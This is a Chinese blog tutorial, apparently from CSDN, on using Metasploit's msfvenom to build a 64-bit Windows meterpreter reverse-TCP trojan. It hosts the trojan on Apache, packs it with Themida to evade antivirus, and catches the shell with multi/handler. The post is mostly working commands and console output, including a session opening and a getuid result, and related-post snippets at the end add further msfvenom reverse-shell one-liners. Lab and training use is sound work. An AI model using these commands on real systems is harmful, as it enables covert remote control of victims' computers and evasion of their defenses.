【网络安全】 MSF生成木马教程

已于 2024-03-15 15:29:33 修改
阅读量1.4k 收藏 15
点赞数 8
分类专栏: 网络安全 文章标签: web安全 安全
于 2024-03-13 14:11:24 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/mshxuyi/article/details/136677946
版权

本文章仅用于信息安全学习,请遵守相关法律法规,严禁用于非法途径。若读者因此作出任何危害网络安全的行为,后果自负,与作者无关。

环境准备:

名称系统位数IP
攻击机Kali Linux6410.3.0.231
客户端Windows 76410.3.0.234
一、生成木马 

1、在Kali机器上面生成木马,注意这里是64位的木马

msfvenom -p windows/x64/meterpreter/reverse_tcp -b '\x00\x0b' -f exe lhost=10.3.0.231 lport=9999 -o /var/www/html/shellx64.exe

2、启动Apache,方便客户端下载

service apache2 start

3、免杀加壳:本例用的是 Themida

二、Kali 开启监听

1、开启MSF

┌──(root㉿Kali)-[~]
└─# msfconsole

2、使用监听模块

msf6 > use exploit/multi/handler

# 输出
[*] Using configured payload generic/shell_reverse_tcp

2、设置Payload

msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp

# 输出
payload => windows/x64/meterpreter/reverse_tcp

 3、设置监听IP

msf6 exploit(multi/handler) > set lhost 10.3.0.231

# 输出
lhost => 10.3.0.231

4、设置监听端口

msf6 exploit(multi/handler) > set lport 9999

# 输出
lport => 9999

 5、运行

msf6 exploit(multi/handler) > run

# 输出
[*] Started reverse TCP handler on 10.3.0.231:9999
三、客户端运行

1、模拟下载木马 

http://10.3.0.231/shell.exe

2、点击运行木马

四、获取权限

1、当出现 meterpreter,表示成功入侵

msf6 exploit(multi/handler) > run

[*] Started reverse TCP handler on 10.3.0.231:9999 
[*] Sending stage (175686 bytes) to 10.3.0.227
[*] Meterpreter session 1 opened (10.3.0.231:9999 -> 10.3.0.227:58484) at 2024-03-13 14:02:01 +0800

meterpreter >

2、查看权限,当客户机是普通用户登录的话,此时获取到的就是一个普通 user 权限

meterpreter > getuid

# 输出
Server username: tomma-PC\tomma
Tom Ma.
关注
  • 8
    点赞
  • 15
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
渗透测试教学之MSF生成木马
weixin_45109326的博客
08-20 3453
msfvenom是msf中的一个独立的负载生成器,它可以利用msf中的payloads和encoders来生成各种格式的木马文件,并在目标机上执行,配合meterpreter在本地监听上线。msfvenom是msfpayload和msfencode的结合体,可以一步完成负载生成和编码免杀的操作。
2024年网络安全最新【网络安全MSF生成木马教程
2401_84281712的博客
05-03 300
这里只是将部分目录截图出来,全套包含大厂面经、学习笔记、源码讲义、实战项目、大纲路线、讲解视频,并且后续会持续更新**2、查看权限,当客户机是普通用户登录的话,此时获取到的就是一个普通 user 权限。1、当出现 meterpreter,表示成功入侵。2、设置Payload。
MSF生成后门(制作各种shellcode攻击)
tmzy1的博客
03-09 760
msfpayload,msfencode的结合体,可利用msfvenom生成后门(木马)程序,并在目标机上执行,在本地监听上线。进入msf命令:msconsole再执行msfvenom -h可得到命令帮助。
msf渗透练习-生成木马控制window系统
weixin_49349476的博客
06-12 4446
利用kali的msf工具生成木马window木马,对目标window主机进行控制,本次练习仅用于学习,不要用于非法用途(做个好白帽)
利用msfvenom制作windows木马及免杀马
最新发布
aheyor的博客
07-03 845
注意:linux可以ping通windows,但是windowsping不通linux,查看linux的网关,然后将windows的网关和linux网关配置一致即可相互ping通。原文链接:https://blog.csdn.net/qq_43332640/article/details/124072802。第四步:将生成的捆绑木马发到windows主机,并且打开msf的监听模块。第二步:打开kali启动msfvenom,制作木马。第三步:木马捆绑,(主程序启动之后子程序随之启动)
Metasploit (MSF) 使用:包含基本使用、payload生成、后渗透模块使用
Alone hackers的博客
03-06 4729
Metasploit (MSF) 使用:包含基本使用,payload生成,后渗透模块使用。
msf生成木马
liu_jia_liang的博客
03-29 1万+
Linux   msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=< Your IP Address> LPORT=< Your Port to Connect On> -f elf > shell.elf Windows msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to
MSF生成windows木马
热门推荐
lenkee的博客
10-22 1万+
msfvenom是msfpayload,msfencode的结合体,它的优点是单一,命令行,和效率.利用msfvenom生成木马程序,并在目标机上执行,在本地监听上线 生成exe木马 msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.110 LPORT=4444 -f exe -o 123.exe 192.168.0.110是攻...
MSF生成木马木马的简单使用
爱喝水的仙人树的博客
11-03 9037
本文将介绍有关MSF木马模块的简单使用方式,介绍常见的几种木马生成方式,如有不对的地方,欢迎大家在评论区指正。由于本文仅对部分模块的简单使用进行说明,更多信息请参考官方网址MSFVENOM环境配置说明1. 使用kali虚拟机和Win7(可以低于此版本)虚拟机2. kali虚拟机建议使用最新版本并将系统软件更新至最新版本3. Win7虚拟机务必关闭网络防火墙,不建议使用Win7及以上版本系统,简单的木马会被直接删除4. 查看两台虚拟机的IP地址,确保两台虚拟机之间可以ping通。
【内网安全】——msf木马生成教程
Demo不是emo的博客
01-30 5457
msfvenom生成木马教程
msfmsfvenom的使用—使用Kali渗透工具生成远控木马
GUN_C的博客
11-15 3898
msfvenom的使用
【学习笔记】msf-java木马源码分析
rm -rf *
01-31 874
metasploit-java木马-源码学习
msf安卓手机木马实战要点整理
Vdieoo的博客
04-07 5585
Msf手机木马高级选项设置说明 Androidwakelock 阻止手机休眠以便处理耗时操作 AutoUnhookProcess ? AutoVerifySession 自动验证删除无效会话 AutoVerifySessionTimeout 超时期间等待会话验证发生在几秒钟内 EnableStageEncoding 对第二级有效载荷进行编码 Sessi...
Metasploit(msf)木马生成
m0_58713554的博客
11-04 321
msfvenom -p windows/meterpreter/reverse_tcp LHOST=攻击端ip LPORT=1234 -f exe > /root/新建文件的文件名.exe 2 ls 查看是否创建出了该文件 3 然后进入msfconsole进行监听 4 use exploit/multi/handler 进入监听模式 5 set PAYLOAD set LHOST攻击机ip set LPORT 配置参数 6 run 运行 7 把刚...
msf生成简单木马
qq_44881113的博客
09-04 322
windows 木马 msfvenom -p windows/meterpreter/reverse_http lhost=192.168.1.128 lport=6666 SessionCommunicationTimeout=0 SessionExpirationTimeout=0 -f exe>shell.exe 监听 msfconsole use exploit/multi/handler set payload windows/meterpreter/reverse_http s
网络安全MSF生成木马教程网络安全框架
2401_84240742的博客
04-11 1089
3、免杀加壳:本例用的是 Themida。
使用msf生成木马反弹shell(windows系统)
hmysn的博客
12-23 7006
生成木马进行植入
Msfvenom生成木马实验
m0_74025111的博客
04-24 1095
编码处理型:msfvenom -p <payload> <payload options> -a <arch> --platform <platform> -e <encoder option> -i <encoder times> -b <bad-chars> -n <nopsled> -f <format> -o <path>/root/Desktop /putty.exe -k -f exe -o /tmp/putty_evil.exe生成伪装木马,将payload。
msf生成linux木马
03-16
MSF是Metasploit Framework的缩写,是一款常用的渗透测试工具。要生成Linux木马,可以使用MSF中的payload生成器来创建一个适合Linux系统的payload,然后使用MSF中的exploit模块来利用漏洞,将payload注入到目标系统中,从而实现远程控制。具体操作可以参考MSF的官方文档或相关教程
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值